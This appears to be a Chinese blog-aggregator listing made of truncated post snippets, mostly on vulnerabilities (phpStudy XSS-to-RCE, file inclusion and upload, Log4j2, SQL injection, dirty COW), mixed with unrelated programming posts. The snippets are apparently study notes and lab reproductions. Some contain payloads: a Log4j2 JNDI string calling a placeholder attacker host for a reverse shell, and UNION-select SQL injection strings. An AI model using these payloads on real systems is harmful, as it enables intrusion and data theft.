漏洞2018 2894 cve

小皮1-click漏洞的代码审计学习笔记

漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payload 实现存储型 XSS ,结合小皮本身所具有的计划任务,XSS + CSRF 实现了 RCE 。 因为用户名登录处缺少过滤,所以可以尝试 SQL 漏洞。 ......
漏洞 代码 笔记 click

golang CVE-2016-2183漏洞,https需要添加tls设置加密算法CipherSuites白名单,将弱加密算法DES和3DES去掉。

golang CVE-2016-2183漏洞,https需要添加tls设置加密算法白名单,将弱加密算法DES和3DES去掉。 服务端样例代码 package main import ( "crypto/tls" "fmt" "net/http" ) func handler(writer http. ......
算法 CipherSuites 漏洞 DES 名单

文件包含漏洞

文件包含渗透 1.项目实验环境 2.原理及危害 文件包含漏洞: 即File Inclusion ,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数( include() , require()和include_once() ,requi ......
漏洞 文件

文件上传漏洞

文件上传漏洞原理 1、文件上传( File Upload )是大部分web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并 ......
漏洞 文件

04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询

发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束 ......
靶机 编辑器 漏洞 Kioptrix1 Kioptrix

下载并安装matlab2018

欢迎来到我的友链小屋 下载链接:链接:https://pan.baidu.com/s/1zo_8g0iqWxEwbNa9-FesFw 提取码:4r1w 百度网盘vip:在拼多多搜索百度网盘一天vip 安装流程:http://www.zhanshaoyi.com/8567.html ......
matlab 2018

2018icpc青岛F . Tournament

题目链接:https://codeforces.com/gym/104270/problem/F 题意: 有n个武士,编号1~n, 要进行k轮比赛,每轮比赛中所有武士都要出现,然后两名武士之间会发生决斗,并且一名武士在一轮比赛中只会与另外一名武士决斗,发生决斗的这两名武士,在其他轮比赛中,将不会再次 ......
Tournament 2018 icpc

log4j2漏洞复现

【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba ......
漏洞 log4j2 log4 log 4j

基于LabVIEW 2018开发的自动化测试系统源码,该系统模仿TestStand编写

基于LabVIEW 2018开发的自动化测试系统源码,该系统模仿TestStand编写,使用者无需花大量时间学习TestStand,直接LabVIEW搭好的框架开发即可。 该源码未用到OOP相关知识,用户也无需熟悉OOP,只需了解状态机编程即可。 该源码为示例程序,用户需要根据实际情况进行局部修改。 ......
系统 测试系统 TestStand 源码 LabVIEW

「解题报告」P6313 [eJOI2018] 护照

很神奇的 DP。 首先考虑到 $P=2$ 实际上就是将一个集合划分成了两个不相交的集合,两个集合均合法则答案合法,那么我们可以考虑对每一个集合都求出答案。那么现在就只需要考虑 $P=1$ 的情况了。发现 $n \le 22$,所以直接考虑状压。 为了合法并且给后面的签证留出时间,我们肯定想要让当前的 ......
护照 报告 P6313 6313 2018

《渗透测试》WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等 2022 Day26

#Oracle 参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 测回显:and 1=2 union select '1','2' from dual 爆库:and 1=2 union select '1',(select table ......
amp 漏洞 Mongodb Oracle Sqlmap

Docker API 未授权访问漏洞

因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。 ......
漏洞 Docker API

【题解】[九省联考 2018] 一双木棋 chess(轮廓线 dp)

题目分析: 之前一直听说过轮廓线 $dp$,但是没有真正见过,这次真正见到了让我大为震撼。 轮廓线 $dp$ 顾名思义就是维护轮廓线,这类题目一般都是在网格图上。 而对于任意一条轮廓线也就是一条从左上到右下或者从左下到右上的线,而且一般这种轮廓线都满足一定的性质,也就是不可能存在向内凹陷的情况,即一 ......
题解 轮廓 chess 2018

数仓安全测试之SSRF漏洞

摘要:SSRF (Server-Side Request Forgery,服务器端请求伪造)是指由攻击者构造请求,然后利用服务器的漏洞以服务端的身份向内网发送请求对内网发起攻击。 本文分享自华为云社区《GaussDB(DWS)安全测试之SSRF漏洞》,作者: ACBD。 1. 什么是SSRF漏洞 S ......
漏洞 SSRF

PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)

PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814) 概述 PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞 pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件 FreeBSD 是一种类UNIX操作系统 pfBlockerN ......
pfBlockerNG 漏洞 PfSense 31814 2022

脏牛漏洞原理

漏洞概述 dirty cow漏洞是一种发生在写时复制的竞态条件产生的漏洞 写时复制(copy on write) 允许不同进程中的虚拟内存映射到相同物理内存页面的技术 三个重要流程 A:制作映射内存的副本 B:更新页表,是的虚拟内存指向新创建的物理内存 C 写入内存 tips:他们可以被其他线程中断 ......
漏洞 原理

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)

漏洞主要来自于 iotdb-web-workbench​ IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench​ 中存在不正确的身份验证漏洞。 ......

showDoc漏洞

攻击者使用showDoc的漏洞传播僵尸网络 近日,阿里云安全团队基于威胁情报挖掘网络攻击日志的过程中,发现了使用showDoc漏洞传播僵尸网络和挖矿软件的攻击事件,使用该手法传播僵尸网络暂未被公开报告过。 ShowDoc是一个在线文档分享工具,面向开发者提供针对API接口的文档编写与团队协作功能。早 ......
漏洞 showDoc

基于mysqludf_sys.so漏洞的提权

基于mysqludf_sys.so漏洞的提权 有时候目标机里会存在mysqludf_sys.so文件,那即表示数据库里可能存在用户自定义的功能函数。 UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数 ......
mysqludf_sys 漏洞 mysqludf sys so

小皮Windows web面板漏洞详解

PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 小皮 Windows web 面板存在存储型 xss 漏洞,结合后台计划任务即可实现 RCE。 ......
漏洞 面板 Windows web

《渗透测试》WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL 2022 Day25

1 mysql一些命令介绍 1 load_file() 通过select load_file('xx.xx');读取文件 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allow ......
amp PostgreSQL 漏洞 MYSQL MSSQL

关于根据大佬的 (D-Link DSL-3782 的 CVE-2022-34527 漏洞分析)

关于根据大佬的 (D-Link DSL-3782 的 CVE-2022-34527 漏洞分析) 第一步、提取固件并分析 使用binwalk提取DSL-3782路由器的固件文件, binwalk -Me DSL-3782_A1_EU_1.01_07282016.bin 然后就可以在系统文件里面随意分析 ......
漏洞分析 漏洞 D-Link 34527 3782

fastjson漏洞利用

基础预备 JNDI java name and directory invoke JNDI是一组应用程序接口 提供了查找和访问命名和目录服务的通用,统一接口 java name and Directory interface RMI RMI 远程方法调用 依赖JRMP Java remote mes ......
漏洞 fastjson

变量覆盖--duomicms通杀漏洞

下载源码本地测试 然后进行代码审计 发现这个地方可能存在变量覆盖:/duomiphp/common.php查看包含了common.php的地方 先看看后台登录的地方,调用了common.phplogin.php查看了一下,没有可以构造变量的地方。但是login.php包含了check.admin.p ......
变量 漏洞 duomicms

【漏洞复现】Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

#【漏洞复现】Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228) 0x01 漏洞描述 Apache Log4j2 是一个基于 Java 的日志记录工具, 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可 ......
漏洞 Apache Log4j2 lookup 44228

《渗透测试》WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移 2022 Day24

1 前置知识: -SQL注入漏洞产生原理分析 攻击者利用服务器中的web应用程序将带有恶意的SQL语句作为Web表单中的参数提交 到服务器,服务器所接受的程序又将带有恶意的SQL语句作为SQL语句中的一个参数执行, 这样根据程序返回的结果攻击者可获得想知道的数据 -SQL注入漏洞危害利用分析 漏洞产 ......
amp 漏洞 ACCESS MYSQL 2022

浅析Nginx文件解析漏洞

浅析Nginx文件解析漏洞 本文章将从五个维度对Nginx文件解析漏洞进行剖析——原理、危害、检测、防御、复现 1、原理 ​ Nginx文件解析漏洞的产生原因是由于Nginx配置文件default.conf以及PHP配置文件php.ini的错误配置。 ​ 引发该漏洞的错误配置分别如下: Nginx ......
漏洞 文件 Nginx

省选联考 2018 题解

感觉有的歌确实不适合中午刚起来脑袋晕晕乎乎的就去听。太舒缓或者太激烈都不太好。太舒缓容易让人想睡回去,比如我今天中午打了半个小时哈欠。太激烈的……想象一下中午如果放 VIS::CRACKED 会怎样。反正要我我会晕一下午。那我得好好思考一下什么东西能卡在这两个界之间。那我寻思着不如来点 Eurobe ......
题解 2018

CVE-2017-10271

Weblogic“wls-wsat”组件在反序列化操作时使用了Oracle官方的JDK组件中“XMLDecoder”类进行XML反序列化操作引发了代码执行XMLDecoder 类用于读取使用 XMLEncoder 创建的 XML 文档 ......
10271 2017 CVE

ChatGPT 出现严重技术漏洞,“当红炸子鸡”翻车了?

ChatGPT翻车了吗? 最近爆火的ChatGPT出现了严重技术漏洞,用户在社交媒体上表示看到了其他人的历史搜索记录标题。 一名推特用户21日发文称,“如果你使用ChatGPT请小心!你的聊天记录可能会被分享给其他用户!今天,我看到了另一个用户的聊天记录。我无法看到内容,但可以看到他们近期的聊天记录 ......
炸子鸡 漏洞 ChatGPT 技术